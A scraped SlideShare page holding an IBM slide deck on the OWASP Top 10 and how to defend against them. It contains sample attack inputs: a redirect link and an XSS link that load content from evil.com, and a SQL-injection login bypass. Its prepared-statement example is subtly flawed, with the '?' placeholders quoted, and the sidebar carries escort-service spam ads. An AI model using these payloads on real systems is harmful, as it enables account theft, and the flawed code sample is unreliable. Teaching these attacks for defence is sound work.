Orchestrate Your Security Defenses to Optimize the Impact of Threat IntelligenceOrchestrate Your Security Defenses to Optimize the Impact of Threat Intelligence
Orchestrate Your Security Defenses to Optimize the Impact of Threat Intelligence
 
Your Mainframe Environment is a Treasure Trove: Is Your Sensitive Data Protec...
Your Mainframe Environment is a Treasure Trove: Is Your Sensitive Data Protec...Your Mainframe Environment is a Treasure Trove: Is Your Sensitive Data Protec...
Your Mainframe Environment is a Treasure Trove: Is Your Sensitive Data Protec...
 
Meet the New IBM i2 QRadar Offense Investigator App and Start Threat Hunting ...
Meet the New IBM i2 QRadar Offense Investigator App and Start Threat Hunting ...Meet the New IBM i2 QRadar Offense Investigator App and Start Threat Hunting ...
Meet the New IBM i2 QRadar Offense Investigator App and Start Threat Hunting ...
 
Understanding the Impact of Today's Security Breaches: The 2017 Ponemon Cost ...
Understanding the Impact of Today's Security Breaches: The 2017 Ponemon Cost ...Understanding the Impact of Today's Security Breaches: The 2017 Ponemon Cost ...
Understanding the Impact of Today's Security Breaches: The 2017 Ponemon Cost ...
 
WannaCry Ransomware Attack: What to Do Now
WannaCry Ransomware Attack: What to Do NowWannaCry Ransomware Attack: What to Do Now
WannaCry Ransomware Attack: What to Do Now
 
How to Improve Threat Detection & Simplify Security Operations
How to Improve Threat Detection & Simplify Security OperationsHow to Improve Threat Detection & Simplify Security Operations
How to Improve Threat Detection & Simplify Security Operations
 
IBM QRadar UBA
IBM QRadar UBA IBM QRadar UBA
IBM QRadar UBA
 
Mobile Vision 2020
Mobile Vision 2020Mobile Vision 2020
Mobile Vision 2020
 
Retail Mobility, Productivity and Security
Retail Mobility, Productivity and SecurityRetail Mobility, Productivity and Security
Retail Mobility, Productivity and Security
 
Close the Loop on Incident Response
Close the Loop on Incident ResponseClose the Loop on Incident Response
Close the Loop on Incident Response
 
Orchestrate Your Security Defenses; Protect Against Insider Threats
Orchestrate Your Security Defenses; Protect Against Insider Threats Orchestrate Your Security Defenses; Protect Against Insider Threats
Orchestrate Your Security Defenses; Protect Against Insider Threats
 

Recently uploaded

Artificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning eraArtificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning eraDeakin University
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machinePadma Pradeep
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountPuma Security, LLC
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure servicePooja Nehwal
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
Azure Monitor & Application Insight to monitor Infrastructure & Application
Azure Monitor & Application Insight to monitor Infrastructure & ApplicationAzure Monitor & Application Insight to monitor Infrastructure & Application
Azure Monitor & Application Insight to monitor Infrastructure & ApplicationAndikSusilo4
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksSoftradix Technologies
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Allon Mureinik
 
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptxMaking_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptxnull - The Open Security Community
 
Hyderabad Call Girls Khairatabad ✨ 7001305949 ✨ Cheap Price Your Budget
Hyderabad Call Girls Khairatabad ✨ 7001305949 ✨ Cheap Price Your BudgetHyderabad Call Girls Khairatabad ✨ 7001305949 ✨ Cheap Price Your Budget
Hyderabad Call Girls Khairatabad ✨ 7001305949 ✨ Cheap Price Your BudgetEnjoy Anytime
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesSinan KOZAK
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024Scott Keck-Warren
 

Recently uploaded (20)

Artificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning eraArtificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning era
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machine
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
 
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptxE-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
The transition to renewables in India.pdf
The transition to renewables in India.pdfThe transition to renewables in India.pdf
The transition to renewables in India.pdf
 
Azure Monitor & Application Insight to monitor Infrastructure & Application
Azure Monitor & Application Insight to monitor Infrastructure & ApplicationAzure Monitor & Application Insight to monitor Infrastructure & Application
Azure Monitor & Application Insight to monitor Infrastructure & Application
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other Frameworks
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)
 
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptxMaking_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
 
Hyderabad Call Girls Khairatabad ✨ 7001305949 ✨ Cheap Price Your Budget
Hyderabad Call Girls Khairatabad ✨ 7001305949 ✨ Cheap Price Your BudgetHyderabad Call Girls Khairatabad ✨ 7001305949 ✨ Cheap Price Your Budget
Hyderabad Call Girls Khairatabad ✨ 7001305949 ✨ Cheap Price Your Budget
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024
 

Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Happening to You

  • 1. © 2012 IBM Corporation IBM Security Systems 1© 2015 IBM Corporation Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Happening to You Paul Ionescu Ethical Hacking Team IBM Security Systems
  • 2. 2 Security Systems - Ethical Hacking Team Applications an Essential Component of Today’s Technology • Development moving more and more towards Web Applications • Mobile Applications connecting to a public REST application • Internet of Things with devices such as refrigerators and light switches connecting to Public Web Applications
  • 3. 3 Security Systems - Ethical Hacking Team The Application Layer Is Fully Exposed • Companies cannot block access to their public applications • Data is coming from the attacker’s laptop and going directly to the database
  • 4. 4 Security Systems - Ethical Hacking Team Application Attacks and Security Incidents - 2014 • Attacks on Web Applications - the majority of disclosed attack types in 2014 • SQL Injection 2nd most common attack behind DDoS • Data from X-Force Interactive Security Incidents web site: http://www-03.ibm.com/security/xforce/xfisi/
  • 5. 5 Security Systems - Ethical Hacking Team OWASP Top 10  OWASP is the Open Web Application Security Project and its mission is to enable developers to write secure code  OWASP maintains a top of the most common categories of Web Application Vulnerabilities 5
  • 6. 6 Security Systems - Ethical Hacking Team 10. Unvalidated Redirects and Forwards Cybercriminals use trusted links to redirect to malicious resources. • Imagine that the attacker got the admin contact from the Whois record and is looking to gain access through a spear phishing attack. • The attacker sends an e-mail to the victim containing a link to the company server prompting them for action. • The link is legit and the victim clicks it. Example: • This is an automated notification from your web server. The web site is down. See error log at this link: http://altoro.mybluemix.net/cgi-bin/index.cgi?http://evil.com/drive.html • The link redirects the victim to a malicious site which leverages a vulnerability in the browser installing a Trojan. 6
  • 7. 7 Security Systems - Ethical Hacking Team 9. Using Components with Known Vulnerabilities • Vulnerabilities in third party components are used to take over unpatched systems • Such vulnerabilities can be any of the issues presented in this session • Two notable vulnerabilities popularized through mass media in 2014 were Heartbleed and Shellshock • Heartbleed is a Buffer Overflow type of issue in Open SSL • Shellshock is a Shell Command Injection attack in Bash (the Linux Born Again Shell) 7
  • 8. 8 Security Systems - Ethical Hacking Team 8. Cross Site Request Forgery (CSRF) • Attacker can invoke “blind” actions on web applications, impersonating as a trusted use • Let's say that Steven Speed has an account with the fictitious bank Altoro Mutual and is in dire need of some cash • He observes how the transfer funds page works and creates an attack page that executes a transfer from other users of the bank into his account • Obviously the attacker will make this page look innocuous-- perhaps a page with pictures of cats • Then the attacker plants a link to this page on a social networking site, luring his victims with the promise of cute kitty cat pictures 8
  • 9. 9 Security Systems - Ethical Hacking Team 7. Missing Function Level Access Control • Attackers abuse the application to elevate their privileges either because access control is defective or because is missing • As a limited user, I log in to my bank account and change the URL to access the administration page. If authorization is not properly employed I am now an administrator of the site 9
  • 10. 10 Security Systems - Ethical Hacking Team 6. Sensitive Data Exposure • What is it? •Confidential data may be stolen due to incorrect data encryption • What are the implications? •Incorrect handling of security protocols allows data to be stolen in transit •Database can be stolen •Passwords can be stolen from configuration files • So let's say that the attacker got Shell Access using ShellShock • Now the attacker needs root access. Next thing the attacker will do is go hunt for passwords in clear text 10
  • 11. 11 Security Systems - Ethical Hacking Team 5. Security Misconfiguration • Improper server or web application configuration allows attackers to take over • For example, the Tomcat Manager page may be enabled on the server • If we are able to get access to this page we can certainly own the server and upload malware to it 11
  • 12. 12 Security Systems - Ethical Hacking Team 4. Insecure Direct Object References • Attackers can access sensitive files and resources because the application allows the user to specify which files/resources are to be loaded • For example imagine that you need to load static html content into a dynamic context • Easiest thing to do is to allow the user to specify the html file name through content parameter value. That makes it easy to use in the future, say if we needed to add more html content, right? Wrong! • Attackers can manipulate the value of the content parameter to access other files (let's say: /etc/passwd) 12
  • 13. 13 Security Systems - Ethical Hacking Team 3. Cross-Site Scripting (XSS) • Attackers embed malicious scripts into legitimate site changing the website's functionality • Let's say we wanted to get the admin's credentials. We could send them an 'alert e-mail' from the site saying the site is down • The link contains a malicious JS include which will alter the site's functionality to obtain the admin's credentials “This is an automated notification from your web server. The web site is down. See error log at this link: http://altoro.mybluemix.net:8080/altoro/search.jsp?query=%3Cscript+src %3D%22http%3A%2F%2Fevil.com%2Fxss.js%22%3E%3C%2Fscript%3E” 13
  • 14. 14 Security Systems - Ethical Hacking Team 2. Broken Authentication and Session Management • What is it? • Session management assets like user credentials and session IDs not properly protected • What are the implications? • User authentication credentials aren’t protected when stored using hashing or encryption • Credentials can be guessed or overwritten through weak account management functions (e.g., account creation, change password, recover password, weak session IDs) • Session IDs are exposed in the URL (e.g., URL rewriting) • Session IDs are vulnerable to session fixation attacks • Session IDs don’t timeout, or user sessions or authentication tokens, particularly single sign-on (SSO) tokens, aren’t properly invalidated during logout. • Session IDs aren’t rotated after successful login. • Passwords, session IDs, and other credentials are sent over unencrypted connections. 14
  • 15. 15 Security Systems - Ethical Hacking Team 1. Injection • User-supplied data is sent to an interpreter as part of a command, query or data • What are the common implications? • SQL Injection – Access/modify data in DB • Command Injection – Execute OS Commands • LDAP Injection – Bypass authentication with LDAP server • etc... • One very common exploit scenario is bypassing user authentication on the login page by manipulating the SQL query select * from users where userName='admin'---' and password='pass'; 15
  • 16. 16 Security Systems - Ethical Hacking Team Defending Against OWASP Top 10 Attacks • Building security software defenses early into the SDLC can amount to millions of dollars saved by avoiding security breaches • NIST study on the cost of fixing software defects $100 invested in the design phase amount to $3000 savings post release • A 2014 report by the Ponemon Institute found that the average total cost of a data breach for the companies participating in its research increased 15 percent to $3.5 million (http://www-935.ibm.com/services/us/en/it- services/security-services/cost-of-data-breach/) • Those architects who spend the extra $100 to improve their application security are the unsung heroes. Without anyone’s knowledge, they have potentially saved their organization millions of dollars 16
  • 17. 17 Security Systems - Ethical Hacking Team Threat Modeling and Secure Coding • Threat Modeling allows developers to design software defenses before the code is written • Where available, software defenses should be employed as a default mechanism or part of a framework (e.g. parameterized statements in a database framework) • Secure Coding checklists should be used when developing new code • Secure Coding practices verified through code review
  • 18. 18 Security Systems - Ethical Hacking Team Input Validation • Can address OWASP attack categories of injection, cross-site scripting, insecure direct object reference and invalidated redirects and forwards • Basic tenet of software programming. Very simple, low-cost technique. If the input is supposed to be a numeric value, make sure the string is only composed of characters 0–9 • This countermeasure can be applied in a framework
  • 19. 19 Security Systems - Ethical Hacking Team Parameterized Command Calls • Can address OWASP attack category of injection • If you must allow values coming from the user to contain characters that could construct shell or SQL commands, using the parameterized command calls is a simple way to prevent them from executing. The following is an example: java.sql.PreparedStatement stmt = connection.prepareStatement(“select * from users where username=‘?’ and pass = ‘?'”); stmt.setString(1,username); stmt.setString(2,pass); stmt.executeQuery();
  • 20. 20 Security Systems - Ethical Hacking Team Output Encoding • Can address OWASP attack category of Cross-Site Scripting • If you must allow values coming from the user to contain HTML-type markup or JavaScript, consider encoding these values when reflecting them back into the page • For example, HTML encoding ensures HTML markup characters provided by the user do not alter the content of the page
  • 21. 21 Security Systems - Ethical Hacking Team Request Token Checks • Can address OWASP attack categories of cross-site request forgery, reflected cross-site scripting, broken authentication and session management • This countermeasure prevents many types of client-side attacks. It makes HTTP requests to the application expire, independent of cookies preventing attackers from storing such requests in malicious sites or emails • For example, the request below cannot be stored in an external site so long as the value of the CSRF token expires: POST https://mysite/transferMoney HTTP/1.1 CsrfToken: 534b44a19bf18d20b71ecc4eb77c572f Cookie: JSESSIONID = c3625d6826a0e46cf6c51b7499bc63c8;
  • 22. 22 Security Systems - Ethical Hacking Team Encryption • Can address OWASP attack categories of sensitive data exposure, broken authentication and session management • If you must allow values coming from the user to contain HTML-type markup or JavaScript, consider encoding these values when reflecting them back into the page • For example, HTML encoding ensures HTML markup characters provided by the user do not alter the content of the page • When data is in transit between the client and the Web application, or between the application and some other third party, it should be encrypted by using a secure communication protocol. This prevents attackers from listening in on the wire. • When the data at rest is stored in a database or a configuration file, it should also be encrypted or hashed. This thwarts attackers who try to break in from escalating privileges or gaining access to sensitive information.
  • 23. 23 Security Systems - Ethical Hacking Team Testing Software Defenses using Application Scanners • As you can imagine there are many combinations and variants of these attacks • You can use an automated vulnerability scanner such as IBM Security AppScan to help you find these issues in your applications • Security scans can also be configured so they occur along with other QA automation 23
  • 24. 24 Security Systems - Ethical Hacking Team IBM Security AppScan Standard 24
  • 25. 25 Security Systems - Ethical Hacking Team Testing Security Coding Practices using Static Analysis • You can validate that the code being written follows secure coding practices using code scanners such as AppScan Source • Scans can also be configured so they occur along with other build automation 25
  • 26. 26 Security Systems - Ethical Hacking Team IBM Security AppScan Source 26
  • 27. 27 Security Systems - Ethical Hacking Team Managing an Application Security Program • Organizations with many software projects need a centralized collaboration tool for monitoring and managing of secure engineering activities, such as AppScan Enterprise 27 Threat Modeling & Secure Coding Education and Awareness Security Incident Response Security Testing Inventory assets Assess business impact Measure status & progress Prioritize vulnerabilities Determine compliance Application Security Program
  • 28. 28 Security Systems - Ethical Hacking Team Q&A
  • 29. © 2012 IBM Corporation IBM Security Systems 29© 2015 IBM Corporation THANK YOU! @IBMSecurity @pauliones #hackingdemos